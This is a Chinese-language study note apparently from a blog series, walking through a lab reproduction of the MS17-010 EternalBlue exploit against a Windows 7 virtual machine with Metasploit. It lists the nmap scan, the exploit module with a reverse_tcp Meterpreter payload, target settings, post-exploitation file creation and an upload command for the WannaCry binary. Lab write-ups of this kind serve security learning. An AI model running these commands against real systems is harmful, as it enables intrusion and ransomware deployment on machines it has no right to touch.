Metasploit学习笔记(二)——永恒之蓝MS17-010漏洞复现

文章目录

  • 1. 前期准备
  • 2. 保证受害者与攻击者主机能够通信
  • 3. 检查受害主机的TCP端口是否打开
  • 4. 在msfconsole中查询漏洞利用模块
  • 5. 利用永恒之蓝漏洞并设置相关参数
  • 6. 利用成功,获取WINDOWS系统管理员权限
  • 7. 创建文件控制目标
  • 8.上传wannacry

1. 前期准备

虚拟机:

  • kali
  • Windows 7

2. 保证受害者与攻击者主机能够通信

开启了两台虚拟机,保证在同一网段下

##Kali
ifconfig
##Windows 7
ipconfig

Kali攻击机IP为192.168.92.131
Metasploit学习笔记(二)——永恒之蓝MS17-010漏洞复现_第1张图片
Windows下IP地址为192.168.92.136
Metasploit学习笔记(二)——永恒之蓝MS17-010漏洞复现_第2张图片

两台虚拟机在同一网段,故可保持通信

3. 检查受害主机的TCP端口是否打开

nmap -sS 192.168.92.136

使用的是nmap模块,输入命令进行扫描
Metasploit学习笔记(二)——永恒之蓝MS17-010漏洞复现_第3张图片
发现445端口打开,SMB漏洞MS17-010(永恒之蓝)正是基于445端口进行传播,因此可以加以利用

4. 在msfconsole中查询漏洞利用模块

这里有各种MS17-010漏洞版本,我们根据目标系统选择编号为3的版本

msfconsole
search ms17-010

Metasploit学习笔记(二)——永恒之蓝MS17-010漏洞复现_第4张图片Metasploit学习笔记(二)——永恒之蓝MS17-010漏洞复现_第5张图片

5. 利用永恒之蓝漏洞并设置相关参数

use exploit/windows/smb/ms17_010_eternalblue
##利用永恒之蓝漏洞
set payload windows/x64/meterpreter/reverse_tcp
##设置payload

在这里插入图片描述

set LHOST 192.168.92.131
##设置本机IP地址
set RHOSTS 192.168.92.136
##设置受害主机IP
set RPORT 445
##设置端口445,注意该端口共享功能是高危漏洞端口,包括之前分享的1393389等
exploit
##利用漏洞

Metasploit学习笔记(二)——永恒之蓝MS17-010漏洞复现_第6张图片
看到WIN才说明利用成功,FAIL就是失败
Metasploit学习笔记(二)——永恒之蓝MS17-010漏洞复现_第7张图片

6. 利用成功,获取WINDOWS系统管理员权限

getuid

返回系统管理员权限
Metasploit学习笔记(二)——永恒之蓝MS17-010漏洞复现_第8张图片

7. 创建文件控制目标

cd ..
# 创建文件夹
mkdir hacker
# 访问目录
dir
cd hacker
# 创建文件并写入内容
echo helloworld>test.txt

Metasploit学习笔记(二)——永恒之蓝MS17-010漏洞复现_第9张图片
就可以看到windows7电脑中新建了这么个文件
Metasploit学习笔记(二)——永恒之蓝MS17-010漏洞复现_第10张图片

8.上传wannacry

我没这个病毒就不传了哈哈哈哈哈

shell
upload /root/wcry.exe c:\

你可能感兴趣的:(WEB学习,Metasploit,学习,网络,安全,永恒之蓝,kali)